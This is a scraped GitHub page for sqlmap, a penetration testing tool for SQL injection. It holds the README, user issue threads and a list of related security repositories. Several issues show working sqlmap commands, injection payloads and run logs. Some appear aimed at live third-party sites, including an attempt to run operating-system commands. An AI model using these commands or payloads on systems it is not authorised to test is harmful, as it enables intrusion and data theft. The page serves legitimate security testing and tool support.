Automatic SQL injection and database takeover tool

Overview

sqlmap

Build Status Python 2.6|2.7|3.x License GitHub closed issues Twitter

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

sqlmap is sponsored by SpyderSec.

Screenshots

Screenshot

You can visit the collection of screenshots demonstrating some of the features on the wiki.

Installation

You can download the latest tarball by clicking here or latest zipball by clicking here.

Preferably, you can download sqlmap by cloning the Git repository:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with Python version 2.6, 2.7 and 3.x on any platform.

Usage

To get a list of basic options and switches use:

python sqlmap.py -h

To get a list of all options and switches use:

python sqlmap.py -hh

You can find a sample run here. To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the user's manual.

Links

Translations

Issues
  • SQLmap and CVE-2014-1854

    SQLmap and CVE-2014-1854

    Hi,

    Attempting to fully exploit the following vulnerability with sqlmap: http://www.exploit-db.com/exploits/31834/

    You can download the Turnkey Wordpress appliance, then download the vulnerable version of adrotate here:

    http://downloads.wordpress.org/plugin/adrotate.3.9.4.zip

    Simply upload the zip and activate the plugin, you will be vulnerable. I can successfully exploit the SQLi using the PoC and various tinkerings. The fun thing about it is the SQLi result shows up in the Location header (and your HTTP code is 302, instead of 200 when it doesn't work). I have set --code=302 as well as --string='Location:', but I can't get SQLmap to detect it.

    You also must use --tamper=base64encode.

    A problem seems to be there is no body. The result of the first column selected in the payload is put in the Location header.

    opened by brandonprry 38
  • sqlmapapi prot question

    sqlmapapi prot question

    I would like to ask, sqlmapapi if activated will open a port, if I think this port can only visit a ip, sqlmap can be set up?If the port has been scanned, it means that others can access and use.

    enhancement miscellaneous normal 
    opened by M7lrv 28
  • Tor not working

    Tor not working

    can someone tell me, why I gets this error, when I use tor? In normal connecting without tor, all working.

    using python version 2.7
    sqlmap {1.0-dev-nongit-20150919}

    https://gyazo.com/e3ab8127d02ed761fe4723d2b17d43c4

    I use sqlmap.py -u "host" --dbs --tor --tor-type=SOCKS5 --tor-port=9150 --random-agent

    support 
    opened by Pablossoo 23
  • "sqlmap [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)"

    Hi Running sqlmap 1.0-dev, Kali linux up to date, tomcat 7, and latest WebGoat v5.4

    I can log into WebGoat via the browser http://localhost:8080/WebGoat-5.4/attack?Screen=153&menu=1100 with the login and password.

    I then tried to execute this:

    sqlmap -u "http://localhost:8080/WebGoat-5.4/attack?Screen=153&menu=1100" --banner --auth-type="Basic" --auth-cred="webgoat:webgoat"

    but it gives me:

    [*] starting at 17:11:09

    [17:11:09] [INFO] testing connection to the target URL [17:11:09] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401) [17:11:09] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401) [17:11:09] [WARNING] HTTP error codes detected during run: 401 (Unauthorized) - 1 times

    [*] shutting down at 17:11:09

    I did read the manual page and googled the terms “CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials” read some web sites, but still, I’m stumped. I have read the following links:

    https://github.com/sqlmapproject/sqlmap/issues/542 https://github.com/sqlmapproject/sqlmap/issues/125 http://tech4castblog.wordpress.com/2012/04/20/webgoat-http-authentication-type-and-valid-credentials-401-5/ (so is there a way to specify the port number 8080 to sqlmap? Shouldn’t sqlmap be able to figure out the port number since it’s specified in the URL?…is this the cause of error?)

    http://comments.gmane.org/gmane.comp.security.sqlmap/234

    the above came from the following google terms: “sqlmap [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)”

    Appreciate some help. Thanks. Gordon

    bug normal request 
    opened by gordonmasec 23
  • Release a new version

    Release a new version

    v0.9 (the latest tagged release) was tagged on Jul 22, 2012. Please consider tagging and releasing a new version asap.

    high miscellaneous 
    opened by mathiasbynens 23
  • [CRITICAL] unable to retrieve the database names

    [CRITICAL] unable to retrieve the database names

    Hello! Why does not searchable database! I have changed in the Tour test comparison page

    C:\Python27\sqlmap>sqlmap.py -u "http://[REDACTED]/ksjh_list.aspx?year=2011"
    --level 5 --risk 3 --batch --tamper=between,charunicodeencode --dbs --dbms "Micr
    osoft SQL Server"
    
    
    
    [09:54:27] [WARNING] parameter length constraint mechanism detected (e.g. Suhosi
    n patch). Potential problems in enumeration phase can be expected
    GET parameter 'year' is vulnerable. Do you want to keep testing the others (if a
    ny)? [y/N] N
    sqlmap identified the following injection points with a total of 531 HTTP(s) req
    uests:
    
    ---
    Place: GET
    Parameter: year
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: year=2011 AND 2168=2168
    
    ---
    [09:54:27] [WARNING] changes made by tampering scripts are not included in shown
     payload content(s)
    [09:54:27] [INFO] testing MySQL
    [09:54:27] [WARNING] the back-end DBMS is not MySQL
    [09:54:27] [INFO] testing Oracle
    [09:54:28] [WARNING] the back-end DBMS is not Oracle
    [09:54:28] [INFO] testing PostgreSQL
    [09:54:29] [WARNING] the back-end DBMS is not PostgreSQL
    [09:54:29] [INFO] testing Microsoft SQL Server
    [09:54:29] [INFO] confirming Microsoft SQL Server
    [09:54:31] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 2008
    web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
    back-end DBMS: Microsoft SQL Server 2008
    [09:54:31] [INFO] fetching database names
    [09:54:31] [INFO] fetching number of databases
    [09:54:31] [WARNING] running in a single-thread mode. Please consider usage of o
    ption '--threads' for faster data retrieval
    [09:54:31] [INFO] retrieved:
    [09:54:33] [WARNING] in case of continuous data retrieval problems you are advis
    ed to try a switch '--no-cast' or switch '--hex'
    [09:54:33] [ERROR] unable to retrieve the number of databases
    [09:54:33] [INFO] retrieved:
    [09:54:36] [INFO] falling back to current database
    [09:54:36] [INFO] fetching current database
    [09:54:36] [INFO] retrieved:
    [09:54:40] [CRITICAL] unable to retrieve the database names
    [09:54:40] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 145 times
    
    [*] shutting down at 09:54:40
    
    
    C:\Python27\sqlmap>
    
    invalid support 
    opened by aiongw 23
  • Asynchronous RESTful API to interact with sqlmap engine

    Asynchronous RESTful API to interact with sqlmap engine

    Design and develop an asynchronous RESTful API to interact with sqlmap engine. This is useful to use/call sqlmap from custom scripts, web interface, third-party tools or similar as opposed to use it from command line or wrap it as in a call similar to os.popen('sqlmap...').

    This API will replace the XML-RPC service (#287).

    enhancement miscellaneous normal 
    opened by bdamele 22
  • ridiculous sqlmap issue

    ridiculous sqlmap issue

    The number of times where I've had a straight forward injection and sqlmap has failed to exploit it is unbelievable.

    One example was with a parameter vulnerable to time based sql injection after the order by clause, so the payload would be: vulnerableparameter=2,sleep(2)

    Another payload that works is: vulnerableparameter=2,(select/**/sleep(10)/**/from/**/dual/**/where/**/2/**/=/**/5)

    and then sqlmap should expand on that to get database,tables names etc.. etc. If it tries to end the query, it will break e.g using # or -- or any other comments it will break, so I told sqlmap not to use any and since spaces are not allowed, I also made it use mysql comments.

    I've tried: sqlmap.py -u "http://example.com/?vulnerableparameter=2" -p "vulnerableparameter" --prefix="," --suffix="" --technique=T --dbs --dbms=mysql --level=5 --risk=3 --tamper=space2comment

    and unbelievably, it said it was not injectable, unreal.

    How can sqlmap fail to find such simple injections?

    invalid 
    opened by crossedz 22
  • [CRITICAL] unable to execute operating system commands via the back-end DBMS

    [CRITICAL] unable to execute operating system commands via the back-end DBMS

    Hello, could you explain me pls what does it meen this error and what can i change in comnnad that this error delete. THANKS!

    ./sqlmap.py -u http://www.site.com/category.asp?category_id=6 --os-cmd -v l [00:54:07] [INFO] resuming back-end DBMS 'microsoft sql server' [00:54:07] [INFO] testing connection to the target URL

    sqlmap resumed the following injection point(s) from stored session:

    Parameter: category_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: category_id=6 AND 2290=2290

    [00:54:08] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP back-end DBMS: Microsoft SQL Server 2008 [00:54:08] [CRITICAL] unable to execute operating system commands via the back-end DBMS

    [*] shutting down at 00:54:08

    support 
    opened by AVR1234 21
  • log should contain the URI and when it's a POST should contain the POST body

    log should contain the URI and when it's a POST should contain the POST body

    The log output doesn't contain enough information to verify the SQL injection manually.

    It should be enough to be repeatable using manual techniques.

    enhancement low miscellaneous 
    opened by jabra- 21
Releases(1.5)
PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.

PHPGGC: PHP Generic Gadget Chains PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatica

Ambionics Security 1.7k Jun 13, 2021
Ransomware with automatic Coinbase Commerce integration created in C# (Console) and PHP

AWare — C# Ransomware Ransomware with automatic Coinbase Commerce integration created in C# (Console) and PHP PD: AWare is just a proof of concept, wi

in the space 20 Jun 11, 2021
A database of PHP security advisories

PHP Security Advisories Database The PHP Security Advisories Database references known security vulnerabilities in various PHP projects and libraries.

null 1.7k Jun 18, 2021
AstraPay allows Algerian Stores to pay in CryptoCurrency or in Algerian Currency AstraToken

Accept payments in Bitcoin, AstraTokens, Bitcoin Cash, Litecoin, Ethereum, Monero and IOTA directly to your crypto wallet, without any sign-ups or lengthy processes. All you need is to provide your crypto address.

AstraSilicon 12 Apr 15, 2021
🤖 Id obfuscation based on Knuth's multiplicative hashing method for PHP.

Optimus id transformation With this library, you can transform your internal id's to obfuscated integers based on Knuth's integer hash. It is similar

Jens Segers 1.1k Jun 11, 2021
PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application

PHPIDS PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web ap

null 714 Jun 9, 2021
TCrypto is a simple and flexible PHP 5.3+ in-memory key-value storage library

About TCrypto is a simple and flexible PHP 5.3+ in-memory key-value storage library. By default, a cookie will be used as a storage backend. TCrypto h

timoh 53 Dec 22, 2020
Easy to use cryptographic framework for data protection: secure messaging with forward secrecy and secure data storage. Has unified APIs across 14 platforms.

Themis provides strong, usable cryptography for busy people General purpose cryptographic library for storage and messaging for iOS (Swift, Obj-C), An

Cossack Labs 1.3k Jun 17, 2021
㊙️ AntiXSS | Protection against Cross-site scripting (XSS) via PHP

㊙️ AntiXSS "Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inje

Lars Moelleken 420 Jun 13, 2021
A php.ini scanner for best security practices

Scanner for PHP.ini The Iniscan is a tool designed to scan the given php.ini file for common security practices and report back results. Currently it

psec.io 1.5k Jun 10, 2021
Let's Encrypt/ACME Command Line client written in PHP

Acme PHP Acme PHP is a simple yet very extensible CLI client for Let's Encrypt that will help you get and renew free HTTPS certificates. Acme PHP is a

Acme PHP 492 Jun 3, 2021
The OWASP ZAP core project

OWASP ZAP The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by a dedicated internatio

OWASP ZAP 8.6k Jun 14, 2021
Port scanning using PHP!

⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ?? Scanner Port's ?? ???? Don't forget to leave a star! ⭐ ???? Não se esqueça de deixar uma estrela! ⭐ ?? Credits | Créd

Hellen. 3 Apr 16, 2021